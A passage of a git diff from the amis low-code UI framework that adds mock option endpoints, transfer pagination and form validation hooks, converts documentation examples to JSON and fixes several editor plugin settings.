}, + { + "type": "action", + "label": "放大图片", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "zoom", + "args": { + "scale": 50, + }, + "componentId": "zoomImage" + } + ] + } + } + }, + { + "type": "action", + "label": "缩小图片", + "className": "mx-1", + "onEvent": { + "click": { + "actions": [ + { + "actionType": "zoom", + "args": { + "scale": -50, + }, + "componentId": "zoomImage" + } + ] + } + } + } + ] + } +} +``` diff --git a/docs/zh-CN/concepts/event-action.md b/docs/zh-CN/concepts/event-action.md index d8538fd51..58bce45a3 100644 --- a/docs/zh-CN/concepts/event-action.md +++ b/docs/zh-CN/concepts/event-action.md @@ -75,42 +75,42 @@ order: 9 ```schema { - type: 'page', - body: [ + "type": "page", + "body": [ { - type: 'button', - label: '尝试点击、鼠标移入/移出', - level: 'primary', - onEvent: { - click: { - actions: [ + "type": "button", + "label": "尝试点击、鼠标移入/移出", + "level": "primary", + "onEvent": { + "click": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发点击事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发点击事件" } } ] }, - mouseenter: { - actions: [ + "mouseenter": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发鼠标移入事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发鼠标移入事件" } } ] }, - mouseleave: { - actions: [ + "mouseleave": { + "actions": [ { - actionType: 'toast', - args: { - msgType: 'info', - msg: '派发鼠标移出事件' + "actionType": "toast", + "args": { + "msgType": "info", + "msg": "派发鼠标移出事件" } } ] diff --git a/mock/cfc/mock/options/loadDataOnce.js b/mock/cfc/mock/options/loadDataOnce.js new file mode 100644 index 000000000..f0c991201 --- /dev/null +++ b/mock/cfc/mock/options/loadDataOnce.js @@ -0,0 +1,238 @@ +/** 前端分页的接口 */ +module.exports = function (req, res) { + res.json({ + status: 0, + msg: 'ok', + data: { + count: data.length, + items: data + } + }); +}; + +const data = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": 
"David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + }, + { + "label": "Richard Clark", + "value": "21" + }, + { + "label": "Cynthia Martinez", + "value": "22" + }, + { + "label": "Kimberly Walker", + "value": "23" + }, + { + "label": "Timothy Anderson", + "value": "24" + }, + { + "label": "Betty Lee", + "value": "25" + }, + { + "label": "Jeffrey Allen", + "value": "26" + }, + { + "label": "Karen Martinez", + "value": "27" + }, + { + "label": "Anna Lopez", + "value": "28" + }, + { + "label": "Dorothy Anderson", + "value": "29" + }, + { + "label": "David Perez", + "value": "30" + }, + { + "label": "Dorothy Martin", + "value": "31" + }, + { + "label": "George Johnson", + "value": "32" + }, + { + "label": "Donald Jackson", + "value": "33" + }, + { + "label": "Mary Brown", + "value": "34" + }, + { + "label": "Deborah Martinez", + "value": "35" + }, + { + "label": "Donald Jackson", + "value": "36" + }, + { + "label": "Lisa Robinson", + "value": "37" + }, + { + "label": "Laura Martinez", + "value": "38" + }, + { + "label": "Timothy Taylor", + "value": 
"39" + }, + { + "label": "Joseph Martinez", + "value": "40" + }, + { + "label": "Karen Wilson", + "value": "41" + }, + { + "label": "Karen Walker", + "value": "42" + }, + { + "label": "William Martinez", + "value": "43" + }, + { + "label": "Linda Brown", + "value": "44" + }, + { + "label": "Elizabeth Brown", + "value": "45" + }, + { + "label": "Anna Moore", + "value": "46" + }, + { + "label": "Robert Martinez", + "value": "47" + }, + { + "label": "Edward Hernandez", + "value": "48" + }, + { + "label": "Elizabeth Hall", + "value": "49" + }, + { + "label": "Linda Jackson", + "value": "50" + }, + { + "label": "Brian Jones", + "value": "51" + }, + { + "label": "Amy Thompson", + "value": "52" + }, + { + "label": "Kimberly Wilson", + "value": "53" + }, + { + "label": "Nancy Garcia", + "value": "54" + }, + { + "label": "Mary Thompson", + "value": "55" + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1 + }); +}); diff --git a/mock/cfc/mock/options/transfer.js b/mock/cfc/mock/options/transfer.js new file mode 100644 index 000000000..da3cf3e40 --- /dev/null +++ b/mock/cfc/mock/options/transfer.js @@ -0,0 +1,242 @@ +/** Transfer分页接口 */ +module.exports = function (req, res) { + const perPage = Number(req.query.perPage || 10); + const page = Number(req.query.page || 1); + + res.json({ + status: 0, + msg: 'ok', + data: { + count: data.length, + page: page, + items: data.concat().splice((page - 1) * perPage, perPage) + } + }); +}; + +const data = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah 
Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + }, + { + "label": "Richard Clark", + "value": "21" + }, + { + "label": "Cynthia Martinez", + "value": "22" + }, + { + "label": "Kimberly Walker", + "value": "23" + }, + { + "label": "Timothy Anderson", + "value": "24" + }, + { + "label": "Betty Lee", + "value": "25" + }, + { + "label": "Jeffrey Allen", + "value": "26" + }, + { + "label": "Karen Martinez", + "value": "27" + }, + { + "label": "Anna Lopez", + "value": "28" + }, + { + "label": "Dorothy Anderson", + "value": "29" + }, + { + "label": "David Perez", + "value": "30" + }, + { + "label": "Dorothy Martin", + "value": "31" + }, + { + "label": "George Johnson", + "value": "32" + }, + { + "label": "Donald Jackson", + "value": "33" + }, + { + "label": "Mary Brown", + "value": "34" + }, + { + "label": "Deborah Martinez", + "value": "35" + }, + { + "label": "Donald Jackson", + "value": "36" + }, + { + "label": "Lisa Robinson", + "value": "37" + }, + { + "label": "Laura Martinez", + "value": "38" + }, + { + "label": "Timothy Taylor", + "value": "39" + }, + { + "label": "Joseph Martinez", + "value": "40" + }, + { + "label": "Karen Wilson", + "value": "41" + }, + { + "label": "Karen Walker", + "value": "42" + }, + { + "label": "William Martinez", + "value": "43" + }, + { + "label": "Linda Brown", + "value": "44" + }, + { + "label": "Elizabeth Brown", + "value": "45" + }, + { + "label": "Anna Moore", + "value": "46" + }, + { + "label": "Robert Martinez", + "value": "47" + }, + 
{ + "label": "Edward Hernandez", + "value": "48" + }, + { + "label": "Elizabeth Hall", + "value": "49" + }, + { + "label": "Linda Jackson", + "value": "50" + }, + { + "label": "Brian Jones", + "value": "51" + }, + { + "label": "Amy Thompson", + "value": "52" + }, + { + "label": "Kimberly Wilson", + "value": "53" + }, + { + "label": "Nancy Garcia", + "value": "54" + }, + { + "label": "Mary Thompson", + "value": "55" + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1 + }); +}); diff --git a/packages/amis-core/src/actions/CmptAction.ts b/packages/amis-core/src/actions/CmptAction.ts index 92877ab42..6e526e5a4 100644 --- a/packages/amis-core/src/actions/CmptAction.ts +++ b/packages/amis-core/src/actions/CmptAction.ts @@ -36,6 +36,19 @@ export class CmptAction implements RendererAction { */ const key = action.componentId || action.componentName; const dataMergeMode = action.dataMergeMode || 'merge'; + const path = action.args?.path; + + /** 如果args中携带path参数, 则认为是全局变量赋值, 否则认为是组件变量赋值 */ + if (action.actionType === 'setValue' && path && typeof path === 'string') { + const beforeSetData = renderer?.props?.env?.beforeSetData; + if (beforeSetData && typeof beforeSetData === 'function') { + const res = await beforeSetData(renderer, action, event); + + if (res === false) { + return; + } + } + } if (!key) { console.warn('请提供目标组件的componentId或componentName'); @@ -59,23 +72,6 @@ export class CmptAction implements RendererAction { } if (action.actionType === 'setValue') { - const beforeSetData = renderer?.props?.env?.beforeSetData; - const path = action.args?.path; - - /** 如果args中携带path参数, 则认为是全局变量赋值, 否则认为是组件变量赋值 */ - if ( - path && - typeof path === 'string' && - beforeSetData && - typeof beforeSetData === 'function' - ) { - const res = await beforeSetData(renderer, action, event); - - if (res === false) { - return; - } - } - if (component?.setData) { return component?.setData( action.args?.value, diff --git 
a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3b27ded2a..82b8e417b 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -50,6 +50,7 @@ import {isAlive} from 'mobx-state-tree'; import type {LabelAlign} from './Item'; import {injectObjectChain} from '../utils'; +import {reaction} from 'mobx'; export interface FormHorizontal { left?: number; @@ -371,6 +372,7 @@ export interface FormProps onFailed?: (reason: string, errors: any) => any; onFinished: (values: object, action: any) => any; onValidate: (values: object, form: any) => any; + onValidChange?: (valid: boolean, props: any) => void; // 表单数据合法性变更 messages: { fetchSuccess?: string; fetchFailed?: string; @@ -443,6 +445,8 @@ export default class Form extends React.Component<FormProps, object> { 'onChange', 'onFailed', 'onFinished', + 'onValidate', + 'onValidChange', 'onSaved', 'canAccessSuperData', 'lazyChange', @@ -460,8 +464,7 @@ export default class Form extends React.Component<FormProps, object> { [propName: string]: Array<() => Promise<any>>; } = {}; asyncCancel: () => void; - disposeOnValidate: () => void; - disposeRulesValidate: () => void; + toDispose: Array<() => void> = []; shouldLoadInitApi: boolean = false; timer: ReturnType<typeof setTimeout>; mounted: boolean; @@ -532,6 +535,7 @@ export default class Form extends React.Component<FormProps, object> { store, messages: {fetchSuccess, fetchFailed}, onValidate, + onValidChange, promptPageLeave, env, rules @@ -541,49 +545,63 @@ export default class Form extends React.Component<FormProps, object> { if (onValidate) { const finalValidate = promisify(onValidate); - this.disposeOnValidate = this.addHook(async () => { - const result = await finalValidate(store.data, store); + this.toDispose.push( + this.addHook(async () => { + const result = await finalValidate(store.data, store); + + if (result && isObject(result)) { + Object.keys(result).forEach(key => { + let msg 
= result[key]; + const items = store.getItemsByPath(key); + + // 没有找到 + if (!Array.isArray(items) || !items.length) { + return; + } - if (result && isObject(result)) { - Object.keys(result).forEach(key => { - let msg = result[key]; - const items = store.getItemsByPath(key); + // 在setError之前,提前把残留的error信息清除掉,否则每次onValidate后都会一直把报错 append 上去 + items.forEach(item => item.clearError()); - // 没有找到 - if (!Array.isArray(items) || !items.length) { - return; - } - - // 在setError之前,提前把残留的error信息清除掉,否则每次onValidate后都会一直把报错 append 上去 - items.forEach(item => item.clearError()); + if (msg) { + msg = Array.isArray(msg) ? msg : [msg]; + items.forEach(item => item.addError(msg)); + } - if (msg) { - msg = Array.isArray(msg) ? msg : [msg]; - items.forEach(item => item.addError(msg)); - } + delete result[key]; + }); - delete result[key]; - }); + isEmpty(result) + ? store.clearRestError() + : store.setRestError(Object.keys(result).map(key => result[key])); + } + }) + ); + } - isEmpty(result) - ? store.clearRestError() - : store.setRestError(Object.keys(result).map(key => result[key])); - } - }); + // 表单校验结果发生变化时,触发 onValidChange + if (onValidChange) { + this.toDispose.push( + reaction( + () => store.valid, + valid => onValidChange(valid, this.props) + ) + ); } if (Array.isArray(rules) && rules.length) { - this.disposeRulesValidate = this.addHook(() => { - if (!store.valid) { - return; - } + this.toDispose.push( + this.addHook(() => { + if (!store.valid) { + return; + } - rules.forEach( - item => - !evalExpression(item.rule, store.data) && - store.addRestError(item.message, item.name) - ); - }); + rules.forEach( + item => + !evalExpression(item.rule, store.data) && + store.addRestError(item.message, item.name) + ); + }) + ); } if (isEffectiveApi(initApi, store.data, initFetch, initFetchOn)) { @@ -655,8 +673,8 @@ export default class Form extends React.Component<FormProps, object> { // this.lazyHandleChange.flush(); this.lazyEmitChange.cancel(); this.asyncCancel && this.asyncCancel(); - 
this.disposeOnValidate && this.disposeOnValidate(); - this.disposeRulesValidate && this.disposeRulesValidate(); + this.toDispose.forEach(fn => fn()); + this.toDispose = []; window.removeEventListener('beforeunload', this.beforePageUnload); this.unBlockRouting?.(); } @@ -836,30 +854,27 @@ export default class Form extends React.Component<FormProps, object> { return this.props.store.validated; } - validate( + async validate( forceValidate?: boolean, - throwErrors: boolean = false + throwErrors: boolean = false, + toastErrors: boolean = true ): Promise<boolean> { const {store, dispatchEvent, data, messages, translate: __} = this.props; this.flush(); - return store - .validate( - this.hooks['validate'] || [], - forceValidate, - throwErrors, - typeof messages?.validateFailed === 'string' - ? __(filter(messages.validateFailed, store.data)) - : undefined - ) - .then((result: boolean) => { - if (result) { - dispatchEvent('validateSucc', data); - } else { - dispatchEvent('validateError', data); - } - return result; - }); + const result = await store.validate( + this.hooks['validate'] || [], + forceValidate, + throwErrors, + toastErrors === false + ? '' + : typeof messages?.validateFailed === 'string' + ? __(filter(messages.validateFailed, store.data)) + : undefined + ); + + dispatchEvent(result ? 
'validateSucc' : 'validateError', data); + return result; } setErrors(errors: {[propName: string]: string}, tag = 'remote') { diff --git a/packages/amis-core/src/renderers/Options.tsx b/packages/amis-core/src/renderers/Options.tsx index 8746525a0..c037608eb 100644 --- a/packages/amis-core/src/renderers/Options.tsx +++ b/packages/amis-core/src/renderers/Options.tsx @@ -37,6 +37,7 @@ import { FormBaseControl } from './Item'; import {IFormItemStore} from '../store/formItem'; +import {isObject} from 'amis-core'; export type OptionsControlComponent = React.ComponentType<FormControlProps>; @@ -230,7 +231,11 @@ export interface OptionsControlProps selectedOptions: Array<Option>; setOptions: (value: Array<any>, skipNormalize?: boolean) => void; setLoading: (value: boolean) => void; - reloadOptions: (setError?: boolean) => void; + reloadOptions: ( + setError?: boolean, + isInit?: boolean, + data?: Record<string, any> + ) => void; deferLoad: (option: Option) => void; leftDeferLoad: (option: Option, leftOptions: Option) => void; expandTreeOptions: (nodePathArr: any[]) => void; @@ -443,15 +448,12 @@ export function registerOptionsControl(config: OptionsConfig) { ); if (prevOptions !== options) { - formItem.setOptions( - normalizeOptions( - options || [], - undefined, - props.valueField || 'value' - ), - this.changeOptionValue, - props.data + formItem.loadOptionsFromDataScope( + props.source as string, + props.data, + this.changeOptionValue ); + this.normalizeValue(); } } else if ( @@ -792,20 +794,16 @@ export function registerOptionsControl(config: OptionsConfig) { } @autobind - reloadOptions(setError?: boolean, isInit = false) { - const {source, formItem, data, onChange, setPrinstineValue, valueField} = + reloadOptions(setError?: boolean, isInit = false, data = this.props.data) { + const {source, formItem, onChange, setPrinstineValue, valueField} = this.props; if (formItem && isPureVariable(source as string)) { isAlive(formItem) && - formItem.setOptions( - normalizeOptions( - 
resolveVariableAndFilter(source as string, data, '| raw') || [], - undefined, - valueField - ), - this.changeOptionValue, - data + formItem.loadOptionsFromDataScope( + source as string, + data, + this.changeOptionValue ); return; } else if (!formItem || !isEffectiveApi(source, data)) { diff --git a/packages/amis-core/src/renderers/wrapControl.tsx b/packages/amis-core/src/renderers/wrapControl.tsx index e8eda268b..7a6d21249 100644 --- a/packages/amis-core/src/renderers/wrapControl.tsx +++ b/packages/amis-core/src/renderers/wrapControl.tsx @@ -156,7 +156,8 @@ export function wrapControl< minLength, maxLength, validateOnChange, - label + label, + pagination } } = this.props; @@ -230,7 +231,8 @@ export function wrapControl< validateOnChange, label, inputGroupControl, - extraName + extraName, + pagination }); // issue 这个逻辑应该在 combo 里面自己实现。 @@ -380,7 +382,8 @@ export function wrapControl< 'minLength', 'maxLength', 'label', - 'extraName' + 'extraName', + 'pagination' ], prevProps.$schema, props.$schema, diff --git a/packages/amis-core/src/store/combo.ts b/packages/amis-core/src/store/combo.ts index 1b10e7347..67a781966 100644 --- a/packages/amis-core/src/store/combo.ts +++ b/packages/amis-core/src/store/combo.ts @@ -35,7 +35,8 @@ export const ComboStore = iRendererStore minLength: 0, maxLength: 0, length: 0, - activeKey: 0 + activeKey: 0, + memberValidMap: types.optional(types.frozen(), {}) }) .views(self => { function getForms() { @@ -170,13 +171,21 @@ export const ComboStore = iRendererStore self.activeKey = key; } + function setMemberValid(valid: boolean, index: number) { + self.memberValidMap = { + ...self.memberValidMap, + [index]: valid + }; + } + return { config, setActiveKey, bindUniuqueItem, unBindUniuqueItem, addForm, - onChildStoreDispose + onChildStoreDispose, + setMemberValid }; }); diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index f89d4dcb0..d213b5f28 100644 --- a/packages/amis-core/src/store/crud.ts +++ 
b/packages/amis-core/src/store/crud.ts @@ -141,7 +141,32 @@ export const CRUDStore = ServiceStore.named('CRUDStore') ...values }; - if (isObjectShallowModified(originQuery, query, false)) { + /** + * 非严格模式下也需要严格比较的CASE + * @reference https://tc39.es/ecma262/#sec-islooselyequal + */ + const exceptedLooselyRules: [any, any][] = [ + [0, ''], + [false, ''], + [false, '0'], + [false, 0], + [true, 1], + [true, '1'] + ]; + + if ( + isObjectShallowModified(originQuery, query, (lhs: any, rhs: any) => { + if ( + exceptedLooselyRules.some( + rule => rule.includes(lhs) && rule.includes(rhs) + ) + ) { + return lhs !== rhs; + } + + return lhs != rhs; + }) + ) { if (query[pageField || 'page']) { self.page = parseInt(query[pageField || 'page'], 10); } diff --git a/packages/amis-core/src/store/formItem.ts b/packages/amis-core/src/store/formItem.ts index d5a29c7f6..7c1141fd6 100644 --- a/packages/amis-core/src/store/formItem.ts +++ b/packages/amis-core/src/store/formItem.ts @@ -7,11 +7,13 @@ import { Instance } from 'mobx-state-tree'; import isEqualWith from 'lodash/isEqualWith'; +import uniqWith from 'lodash/uniqWith'; import {FormStore, IFormStore} from './form'; import {str2rules, validate as doValidate} from '../utils/validations'; import {Api, Payload, fetchOptions, ApiObject} from '../types'; import {ComboStore, IComboStore, IUniqueGroup} from './combo'; import {evalExpression} from '../utils/tpl'; +import {resolveVariableAndFilter} from '../utils/tpl-builtin'; import {buildApi, isEffectiveApi} from '../utils/api'; import findIndex from 'lodash/findIndex'; import { @@ -98,6 +100,7 @@ export const FormItemStore = StoreNode.named('FormItemStore') joinValues: true, extractValue: false, options: types.optional(types.frozen<Array<any>>(), []), + optionsRaw: types.optional(types.frozen<Array<any>>(), []), expressionsInOptions: false, selectFirst: false, autoFill: types.frozen(), @@ -113,7 +116,18 @@ export const FormItemStore = StoreNode.named('FormItemStore') /** 
当前表单项所属的InputGroup父元素, 用于收集InputGroup的子元素 */ inputGroupControl: types.optional(types.frozen(), {}), colIndex: types.frozen(), - rowIndex: types.frozen() + rowIndex: types.frozen(), + /** Transfer组件分页模式 */ + pagination: types.optional(types.frozen(), { + enable: false, + /** 当前页数 */ + page: 1, + /** 每页显示条数 */ + perPage: 10, + /** 总条数 */ + total: 0 + }), + accumulatedOptions: types.optional(types.frozen<Array<any>>(), []) }) .views(self => { function getForm(): any { @@ -175,6 +189,26 @@ export const FormItemStore = StoreNode.named('FormItemStore') return getLastOptionValue(); }, + /** 数据源接口数据是否开启分页 */ + get enableSourcePagination(): boolean { + return !!self.pagination.enable; + }, + + /** 数据源接口开启分页时当前页码 */ + get sourcePageNum(): number { + return self.pagination.page ?? 1; + }, + + /** 数据源接口开启分页时每页显示条数 */ + get sourcePerPageNum(): number { + return self.pagination.perPage ?? 10; + }, + + /** 数据源接口开启分页时数据总条数 */ + get sourceTotalNum(): number { + return self.pagination.total ?? 0; + }, + getSelectedOptions: ( value: any = self.tmpValue, nodeValueArray?: any[] | undefined @@ -308,7 +342,8 @@ export const FormItemStore = StoreNode.named('FormItemStore') minLength, validateOnChange, label, - inputGroupControl + inputGroupControl, + pagination }: { extraName?: string; required?: boolean; @@ -338,6 +373,11 @@ export const FormItemStore = StoreNode.named('FormItemStore') path: string; [propsName: string]: any; }; + pagination?: { + enable?: boolean; + page?: number; + perPage?: number; + }; }) { if (typeof rules === 'string') { rules = str2rules(rules); @@ -372,6 +412,15 @@ export const FormItemStore = StoreNode.named('FormItemStore') inputGroupControl?.name != null && (self.inputGroupControl = inputGroupControl); + if (pagination && isObject(pagination) && !!pagination.enable) { + self.pagination = { + enable: true, + page: pagination.page ? pagination.page || 1 : 1, + perPage: pagination.perPage ? 
pagination.perPage || 10 : 10, + total: 0 + }; + } + if ( typeof rules !== 'undefined' || typeof required !== 'undefined' || @@ -556,6 +605,23 @@ export const FormItemStore = StoreNode.named('FormItemStore') } } + function setPagination(params: { + page?: number; + perPage?: number; + total?: number; + }) { + const {page, perPage, total} = params || {}; + + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + ...(page != null && typeof page === 'number' ? {page} : {}), + ...(perPage != null && typeof perPage === 'number' ? {perPage} : {}), + ...(total != null && typeof total === 'number' ? {total} : {}) + }; + } + } + function setOptions( options: Array<object>, onChange?: (value: any) => void, @@ -567,6 +633,15 @@ export const FormItemStore = StoreNode.named('FormItemStore') options = filterTree(options, item => item); const originOptions = self.options.concat(); self.options = options; + /** 开启分页后当前选项内容需要累加 */ + self.accumulatedOptions = self.enableSourcePagination + ? uniqWith( + [...originOptions, ...options], + (lhs, rhs) => + lhs[self.valueField ?? 'value'] === + rhs[self.valueField ?? 'value'] + ) + : options; syncOptions(originOptions, data); let selectedOptions; @@ -722,6 +797,14 @@ export const FormItemStore = StoreNode.named('FormItemStore') options = normalizeOptions(options as any, undefined, self.valueField); + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + page: parseInt(json.data?.page, 10) || 1, + total: parseInt(json.data?.total ?? 
json.data?.count, 10) || 0 + }; + } + if (config?.extendsOptions && self.selectedOptions.length > 0) { self.selectedOptions.forEach((item: any) => { const exited = findTree( @@ -752,6 +835,41 @@ export const FormItemStore = StoreNode.named('FormItemStore') return json; }); + /** + * 从数据域加载选项数据源,注意这里默认source变量解析后是全量的数据源 + */ + function loadOptionsFromDataScope( + source: string, + ctx: Record<string, any>, + onChange?: (value: any) => void + ) { + let options: any[] = resolveVariableAndFilter(source, ctx, '| raw'); + + if (!Array.isArray(options)) { + return []; + } + + options = normalizeOptions(options, undefined, self.valueField); + + if (self.enableSourcePagination) { + self.pagination = { + ...self.pagination, + ...(ctx?.page ? {page: ctx?.page} : {}), + ...(ctx?.perPage ? {perPage: ctx?.perPage} : {}), + total: options.length + }; + } + + options = options.slice( + (self.pagination.page - 1) * self.pagination.perPage, + self.pagination.page * self.pagination.perPage + ); + + setOptions(options, onChange, ctx); + + return options; + } + const loadAutoUpdateData: ( api: Api, data?: object, @@ -1377,8 +1495,10 @@ export const FormItemStore = StoreNode.named('FormItemStore') setError, addError, clearError, + setPagination, setOptions, loadOptions, + loadOptionsFromDataScope, deferLoadOptions, deferLoadLeftOptions, expandTreeOptions, diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index a91b06203..c399e9155 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -251,7 +251,7 @@ export function rmUndefined(obj: PlainObject) { export function isObjectShallowModified( prev: any, next: any, - strictMode: boolean = true, + strictModeOrFunc: boolean | ((lhs: any, rhs: any) => boolean) = true, ignoreUndefined: boolean = false, statck: Array<any> = [] ): boolean { @@ -262,7 +262,7 @@ export function isObjectShallowModified( isObjectShallowModified( prev, next[index], - strictMode, + 
strictModeOrFunc, ignoreUndefined, statck ) @@ -281,7 +281,11 @@ export function isObjectShallowModified( isObservable(prev) || isObservable(next) ) { - return strictMode ? prev !== next : prev != next; + if (strictModeOrFunc && typeof strictModeOrFunc === 'function') { + return strictModeOrFunc(prev, next); + } + + return strictModeOrFunc ? prev !== next : prev != next; } if (ignoreUndefined) { @@ -311,7 +315,7 @@ export function isObjectShallowModified( isObjectShallowModified( prev[key], next[key], - strictMode, + strictModeOrFunc, ignoreUndefined, statck ) diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index ff213dc4b..0a88a6929 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -163,7 +163,11 @@ export function formatStyle( const styles: string[] = []; const fn = (key: string, value: string) => { key = valueMap[key] || key; - styles.push(`${kebabCase(key)}: ${value};`); + styles.push( + `${kebabCase(key)}: ${ + value + (weights?.important ? ' !important' : '') + };` + ); }; Object.keys(statusMap[status]).forEach(key => { if (key !== '$$id') { @@ -191,15 +195,11 @@ export function formatStyle( } else { const value = style; if (key === 'iconSize') { - fn('width', value + (weights?.important ? ' !important' : '')); - fn('height', value + (weights?.important ? ' !important' : '')); - fn( - 'font-size', - value + (weights?.important ? ' !important' : '') - ); + fn('width', value); + fn('height', value); + fn('font-size', value); } else { - value && - fn(key, value + (weights?.important ? 
' !important' : '')); + value && fn(key, value); } } } diff --git a/packages/amis-editor-core/src/plugin.ts b/packages/amis-editor-core/src/plugin.ts index 30174d640..f690c34eb 100644 --- a/packages/amis-editor-core/src/plugin.ts +++ b/packages/amis-editor-core/src/plugin.ts @@ -304,7 +304,9 @@ export interface RendererInfo extends RendererScaffoldInfo { sharedContext?: Record<string, any>; dialogTitle?: string; //弹窗标题用于弹窗大纲的展示 dialogType?: string; //区分确认对话框类型 - subEditorVariable?: Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 + getSubEditorVariable?: ( + schema?: any + ) => Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 } export type BasicRendererInfo = Omit< @@ -1051,7 +1053,7 @@ export abstract class BasePlugin implements PluginInterface { isListComponent: plugin.isListComponent, rendererName: plugin.rendererName, memberImmutable: plugin.memberImmutable, - subEditorVariable: plugin.subEditorVariable + getSubEditorVariable: plugin.getSubEditorVariable }; } } diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index ba099172a..cceedf751 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1224,7 +1224,10 @@ export async function resolveVariablesFromScope(node: any, manager: any) { // 子编辑器内读取的host节点自定义变量,非数据域方式,如listSelect的选项值 let hostNodeVaraibles = []; if (manager?.store?.isSubEditor) { - hostNodeVaraibles = manager.config?.hostNode?.info?.subEditorVariable || []; + hostNodeVaraibles = + manager.config?.hostNode?.info?.getSubEditorVariable?.( + manager.config?.hostNode.schema + ) || []; } const variables: VariableItem[] = diff --git a/packages/amis-editor/src/plugin/CRUD.tsx b/packages/amis-editor/src/plugin/CRUD.tsx index ed962e0fb..692f28085 100644 --- a/packages/amis-editor/src/plugin/CRUD.tsx +++ b/packages/amis-editor/src/plugin/CRUD.tsx @@ -578,7 +578,7 @@ export class CRUDPlugin extends BasePlugin { name: 
'filterColumnCount' } ], - visibleOn: 'data.features && data.features.includes("filter")' + visibleOn: "${features && features.includes('filter')}" }, { name: 'columns', diff --git a/packages/amis-editor/src/plugin/Calendar.tsx b/packages/amis-editor/src/plugin/Calendar.tsx index 7f854725c..d4695e697 100644 --- a/packages/amis-editor/src/plugin/Calendar.tsx +++ b/packages/amis-editor/src/plugin/Calendar.tsx @@ -20,7 +20,7 @@ export class CalendarPlugin extends BasePlugin { panelTitle = '日历日程'; description = '展示日历及日程。'; - docLink = '/amis/zh-CN/components/calendor'; + docLink = '/amis/zh-CN/components/calendar'; tags = ['展示']; scaffold = { diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index ddf531ec2..6da992f07 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -474,7 +474,7 @@ export class FormPlugin extends BasePlugin { return { type: 'container', className: 'form-item-gap', - visibleOn: `data.feat === '${feat.value}' && (!data.dsType || data.dsType === '${builderKey}')`, + visibleOn: `$\{feat === '${feat.value}' && (!dsType || dsType === '${builderKey}')}`, body: flatten([ builder.makeSourceSettingForm({ feat: feat.value, @@ -685,26 +685,28 @@ export class FormPlugin extends BasePlugin { const dsSettings = flatten( this.Features.map(feat => this.dsManager.buildCollectionFromBuilders( - (builder, builderKey, index) => ({ - type: 'container', - className: 'form-item-gap', - visibleOn: `data.feat === '${ - feat.value - }' && (data.dsType == null ? 
